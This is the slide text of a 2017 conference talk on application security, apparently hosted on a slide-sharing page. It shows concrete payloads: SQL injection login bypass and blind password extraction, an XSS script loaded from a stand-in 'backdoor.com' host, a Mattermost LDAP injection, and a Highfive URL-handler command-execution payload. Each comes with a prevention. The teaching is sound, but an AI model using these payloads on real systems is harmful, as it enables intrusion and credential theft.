Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

AOEconf17: Application Security

692 Aufrufe

Veröffentlicht am

AOEconf17 talk "Application Security" by Bastian Ike.

Veröffentlicht in: Software
  • Loggen Sie sich ein, um Kommentare anzuzeigen.

AOEconf17: Application Security

  1. 1. Application Security AOE Conf 2017
  2. 2. What is
 Application Security?
  3. 3. Application Security • Security in software • Not management security, perimeter security, etc • Possible Attack vectors • How to prevent issues
  4. 4. Attack vectors
  5. 5. Code Execution Make a system execute arbitrary code
  6. 6. Buffer Overflows • Assembler code injected into memory • 1996, Aleph One, "Smashing the stack for fun and profit" • Possible by overflowing a programs memory with controlled data
  7. 7. SQL Injection • Execute arbitrary SQL code • Possible by interpolating user-submitted data without proper escaping • Can be used to read/write files on DB server
  8. 8. Cross Site Scripting • Execute arbitrary JavaScript in a privileged context • Executed on a client's machine • Privileged context: Browser (domain/cookies) • Steal/Modify cookies • AJAX Requests to privileged areas
  9. 9. Cryptography Attack cryptographic measures for confidentiality and integrity
  10. 10. Signatures • Fake signatures/tokens for unauthorised access
  11. 11. Encryption • Break encryption • Missing encryption • Broken Encryption: • Example: Bleichenbacher RSA
  12. 12. Business Logic Make legit code behave in an unintended way
  13. 13. Race Conditions • Re-order execution flows to change an operations result
  14. 14. Exploit basics
  15. 15. SQL Injection • Query: SELECT * FROM users WHERE 
 username="${USERNAME}" AND 
 password="${PASSWORD}"; • Username: Bastian • Passwort: Sesame098 • Query: SELECT * FROM users WHERE 
 username="Bastian" AND 
 password="Sesame098";
  16. 16. SQL Injection • Query: SELECT * FROM users WHERE 
 username="${USERNAME}" AND 
 password="${PASSWORD}"; • Username: Bastian • Passwort: " OR 1=1 -- x • Query: SELECT * FROM users WHERE 
 username="Bastian" AND 
 password="" OR 1=1 -- x";
  17. 17. SQL Injection • Query: SELECT * FROM logs WHERE 
 token="${TOKEN}"; • Token: a" AND IF(SUBSTRING(
 (SELECT password FROM users WHERE name="admin" LIMIT 1)
 ,0,1) = 'a', SLEEP(5), 0) -- x • Query: SELECT * FROM logs WHERE
 token="a" AND IF(SUBSTRING(
 (SELECT password FROM users WHERE name="admin" LIMIT 1)
 ,0,1) = 'a', SLEEP(5), 0) -- x";
  18. 18. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page=hello • Template: <a href="hello">You are here</a>
  19. 19. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page="><script src="http://backdoor.com/x.js"></script> • Template: <a href=""><script src="http:// backdoor.com/x.js"></script>">You are here</a>
  20. 20. Cross-Site Scripting • Code runs in Browser of the one opening the link • Access to Cookies+LocalStorage • Can send requests and read their result (emulate administrator behaviour) • Change page look/behaviour (steal passwords, etc)
  21. 21. Exploits samples
  22. 22. Mattermost LDAP Injection • https://mattermost/api/v3/users/login • login_id: username)(givenName=test* • password: "" • Response: • 401: OK, query successful • 50x: Error, query failed
  23. 23. Mattermost LDAP Injection
  24. 24. Mattermost LDAP Injection
  25. 25. Mattermost LDAP Injection
  26. 26. Mattermost LDAP Injection • Prevention: properly escape characters which might be interpreted by LDAP
  27. 27. Highfive RCE • Target: URL-Handler highfive:// • Possible arguments: ?domain=, ?protocol=
  28. 28. Highfive RCE Privileged Non-Privileged Display Web-pages Execute processes etc Highfive Sandbox (NW.js) Whitelist: https://highfive.com https://dev.highfive.com
  29. 29. Highfive RCE • highfive://test.com.a/? domain=alert(require('child_process').execSyn c('hostname;echo;id').toString())// &protocol=javascript • Starts Highfive on a privileged initial domain • Redirects to: protocol + '://' + domain + path • Becomes: 
 javascript:// alert(require('child_process').execSync('host name;echo;id').toString())//something
  30. 30. Highfive RCE • Redirect to javascript:// does not change the sandbox • Works on any operating system • Thank you JavaScript 😙
  31. 31. Highfive RCE • Prevention: whitelist redirect targets
  32. 32. JWT Null Tokens
  33. 33. JWT Null Tokens
  34. 34. JWT Null Tokens
  35. 35. JWT Null Tokens
  36. 36. JWT Null Tokens • Prevention: Do not allow null signature algorithms
  37. 37. Preventive actions
  38. 38. Finding Security issues • Code Reviews • Curiosity • (sometimes: automated scanners)
  39. 39. Stay up to date
  40. 40. React fast
  41. 41. React fast • Escalation plan for security incidents • Fast deployment strategies • Firewall setup to cut off possible infected systems • Snapshot infrastructure for later analysis
  42. 42. Thank you :) Questions?

×